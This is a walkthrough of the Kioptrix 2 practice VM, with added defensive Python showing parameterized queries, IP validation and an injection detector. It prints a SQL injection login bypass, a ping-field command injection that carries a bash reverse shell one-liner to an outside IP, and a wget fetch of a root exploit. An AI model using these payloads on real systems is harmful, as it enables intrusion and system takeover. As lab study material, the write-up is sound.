Kioptrix 2 should be a bit harder than Kioptrix 1. I came into this expecting it to be a little harder than it turned out to be. After downloading and setting up the VM I jumped right in, starting off with a quick nmap of the network to find the VM.
We can see that port 80 and 443 are on for http and https. On top of this we have:
Personally I prefer to start things off by having a look at any websites. A lot can be learned by browsing through a website (including ways to gain access).
index.php is an admin login. Cool! From the earlier scans we know that MySQL is running, so I try some SQL injections:
' - nothing
' OR 1=1 - nothing
' OR '1'='1 - BINGO!
I've logged into the site. The SQL statement must have ended with something along the lines of:
... username = '' password = ''
With the injection making it look like:
... username = '' password = '' OR '1'='1'
This OR '1'='1' makes the SQL statement true, which allows me access into the website.
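The login bypass above comes down to how the query is built. The following is an added example (not code from the Kioptrix VM or this writeup) that uses a constructed in-memory SQLite table to show the string-built login check beside a parameterized one, and why the same "' OR '1'='1" input succeeds against the first and fails against the second. The table, the user and the password are all assumptions made up for the demonstration.

```python
import sqlite3

# Constructed sample data; the real site's schema is unknown.
# Storing a plaintext password is only to keep the demo short; real
# applications store a salted hash and compare against that.
SAMPLE_USER = "admin"
SAMPLE_PASSWORD = "not-the-real-password"

# The input from the writeup that bypassed the login.
INJECTED = "' OR '1'='1"


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES (?, ?)", (SAMPLE_USER, SAMPLE_PASSWORD))
    return conn


def login_vulnerable(conn, username, password):
    """String-built query: the user's text becomes part of the SQL itself."""
    query = ("SELECT COUNT(*) FROM users WHERE username = '" + username
             + "' AND password = '" + password + "'")
    try:
        return conn.execute(query).fetchone()[0] > 0
    except sqlite3.Error:
        # A lone quote makes the statement unterminated. Swallowing the error
        # gives the attacker the "nothing" response seen in the writeup; a
        # defender should log it, because it is the signature of a probe.
        return False


def login_parameterized(conn, username, password):
    """Placeholders keep the input as data; quotes in it never alter the query."""
    query = "SELECT COUNT(*) FROM users WHERE username = ? AND password = ?"
    return conn.execute(query, (username, password)).fetchone()[0] > 0


def demo():
    conn = make_db()
    return {
        "vulnerable, injected": login_vulnerable(conn, "", INJECTED),     # True
        "parameterized, injected": login_parameterized(conn, "", INJECTED),  # False
        "parameterized, real creds": login_parameterized(conn, SAMPLE_USER, SAMPLE_PASSWORD),
    }


if __name__ == "__main__":
    for label, result in demo().items():
        print(f"{label}: {result}")
```

With the string-built query the WHERE clause becomes `username = '' AND password = '' OR '1'='1'`; the trailing OR is always true, so the count is never zero. With placeholders the database compares the password column against the literal text `' OR '1'='1`, which matches no row.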
The next page that we are presented with is a ping test page. Cool, we get to send commands through the webpage. This will be easy. First off, to try this I ping the Kali VM.
And it works. Time to try something else:
This works! The next thing to try is a reverse shell. There are many ways to get a reverse shell. Thankfully in this day and age there are webpages that offer examples of this and much more.
pentestmonkey provides a great list of reverse shell "one-liners". These can be delivered multiple ways. In this example I simply place the code after the IP address and a semicolon:
127.0.0.1; bash -i >& /dev/tcp/192.168.0.102/8080 0>&1
At the same time, I have a terminal open listening for the reverse shell. Once it is listening I click on submit.
Now that I'm in it's time to check the kernel version and OS release. This gives me:
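The ping page is exploitable because the submitted field is pasted into a shell command line, so a semicolon ends the ping and starts whatever follows. As an added example that is not part of this writeup or the Kioptrix VM, the Python below shows the string-built form next to a hardened version that validates the field as a single IP address and passes it as an argument vector with no shell in between, plus a small detector a defender could run over request logs. The function names and the argv layout are my own assumptions.

```python
import ipaddress
import re
import subprocess


class RejectedInput(ValueError):
    """Raised when the submitted field is not a single IP address."""


def build_ping_vulnerable(field):
    """Mirrors a ping page that concatenates the field into a shell string.

    Executed with a shell, ';', '|', '&&' and similar all start a new command.
    Returned as a string only so the test can inspect it; never run this.
    """
    return "ping -c 3 " + field


def build_ping_safe(field):
    """Validate first, then build an argv list so no shell ever parses it."""
    try:
        addr = ipaddress.ip_address(field.strip())
    except ValueError:
        raise RejectedInput(f"not an IP address: {field!r}")
    # Each element is one argument; a ';' could only ever be part of the
    # address string, and the validator has already ruled that out.
    return ["ping", "-c", "3", str(addr)]


def run_ping(field, timeout=10):
    """Run the hardened form. Raises RejectedInput on bad input."""
    argv = build_ping_safe(field)
    completed = subprocess.run(argv, capture_output=True, text=True, timeout=timeout)
    return completed.stdout


# Characters that have no place in an IP address but do in a shell command.
_SHELL_METACHARS = re.compile(r"[;|&`$<>(){}\n]")


def looks_like_command_injection(field):
    """Detection helper: flag a submitted value that carries shell syntax."""
    return bool(_SHELL_METACHARS.search(field))


if __name__ == "__main__":
    for sample in ("127.0.0.1", "127.0.0.1; id"):  # constructed inputs
        print(sample, "->", "suspicious" if looks_like_command_injection(sample) else "clean")
        try:
            print("  argv:", build_ping_safe(sample))
        except RejectedInput as exc:
            print("  rejected:", exc)
```

The validation step is what matters: `ipaddress.ip_address` accepts exactly one IPv4 or IPv6 address, so anything with a trailing `; ...` is rejected before a process is ever spawned, and the argv form means even a value that slipped past validation would reach `ping` as a single argument rather than a shell command line. The detector is deliberately simple; it is the kind of check that would have made the first `127.0.0.1; id` style request stand out in the web server logs.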
Linux version 2.6.9-55EL (email@example.com) (gcc version 3.4.6 20060404 (Red Hat 3.4.6-8)) #1 Wed May 2 13:52:16 EDT 2007
CentosOS release 4.5 (Final)
Searching searchsploit and the internet, I find an exploit that will escalate privileges to root (https://www.exploit-db.com/exploits/9542/).
To get this over to the VM I first need to make the exploit available to be grabbed from the VM. So I start Apache and move the exploit to /var/www. Once done, I wget it from the reverse shell and execute it: